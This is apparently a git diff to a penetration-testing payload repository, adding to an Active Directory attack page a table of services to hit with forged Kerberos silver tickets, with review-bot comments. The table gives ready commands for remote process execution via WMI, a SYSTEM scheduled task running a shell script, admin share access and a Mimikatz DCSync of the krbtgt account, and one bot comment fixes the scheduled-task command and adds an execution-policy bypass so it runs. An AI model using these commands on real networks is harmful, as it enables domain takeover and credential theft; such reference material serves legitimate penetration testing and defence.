diff --git a/.github/banner.png b/.github/banner.png new file mode 100644 index 00000000..5c705eb1 Binary files /dev/null and b/.github/banner.png differ diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 72ad555a..5895858b 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -722,7 +722,7 @@ Mitigations: ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine accound password (key) or NTLM hash from the KDC +Forging a TGS require machine accound password (key) or NTLM hash of the service account. ```powershell # Create a ticket for the service @@ -739,6 +739,19 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` +Interesting services to target with a silver ticket : + +| Service Type | Service Silver Tickets | Attack | +|---------------------------------------------|------------------------|--------| +| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` | +| PowerShell Remoting | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` | +| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` | +| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` | +| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` | +| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / | + + Mitigations: * Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket. 
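Review bot: the rewritten line in the `@@ -722,7 +722,7 @@` hunk still carries the typos `require` and `accound`; since the line is being touched anyway, make it read `Forging a TGS requires the machine account password (key) or NTLM hash of the service account.` The substantive correction itself is right: a silver ticket is encrypted with the key of the account that owns the target SPN, so nothing has to be obtained from the KDC, and the old wording would have sent readers looking for the wrong secret.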
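Review bot: the Scheduled Tasks row of the new table in the `@@ -739,6 +739,19 @@` hunk uses `schtasks` switches that do not exist: `/IN` and `/IR` should be `/TN` (task name) and `/TR` (task run), e.g. `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /TN "SCOM Agent Health Check" /TR "C:\shell.ps1"`; and because `/TR` takes a command line, a bare `.ps1` path will not execute under PowerShell, so wrap it as `powershell -ExecutionPolicy Bypass -File C:\shell.ps1`. Smaller points in the same hunk: the PowerShell Remoting and WinRM rows are identical and can be merged into one row; `New-PSSESSION -NAME PSC` works because cmdlet names are case-insensitive, but `New-PSSession -Name PSC` matches the documented casing; `Interesting services to target with a silver ticket :` has a stray space before the colon; the column header `Service Silver Tickets` would be clearer as `Required service ticket(s)`; and the two empty `+` lines before `Mitigations:` produce a double blank line where one is enough.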
@@ -1635,6 +1648,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) * [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) +* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) * [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) * [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) diff --git a/README.md b/README.md index adcb2fe7..d7c9461f 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -# Payloads All The Things +# Payloads All The Things [](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/Koalemos) A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! @@ -8,13 +8,13 @@ You can also contribute with a :beers: IRL, or using the sponsor button.
-
+
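Review bot: the new entry `How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf` in the `@@ -1635,6 +1648,7 @@` hunk breaks the alphabetical order the reference list otherwise keeps (Exploiting, Finding, Fun, Getting, ...): it belongs after the two `Getting the goods with CrackMapExec` lines, not between `Finding Passwords in SYSVOL` and `Fun with LDAP`. The neighbouring entries also carry a date after the author; add one here for consistency if the article has one.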
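Review bot: in the README `@@ -1,4 +1,4 @@` hunk the tweet-intent link's `url=` parameter points at `https://github.com/swisskyrepo/Koalemos`, which is not the repository this README titles (`Payloads All The Things`); confirm that target is intended, otherwise the shared tweet links to the wrong project. As shown, the link text is empty (`[](https://twitter.com/intent/tweet?...)`), so nothing clickable renders next to the heading; if a badge image was meant to sit there, check that the `![...]` image markup made it into the commit. The `@@ -8,13 +8,13 @@` hunk that follows shows only an empty `-` and `+` line, so its content cannot be reviewed from this view.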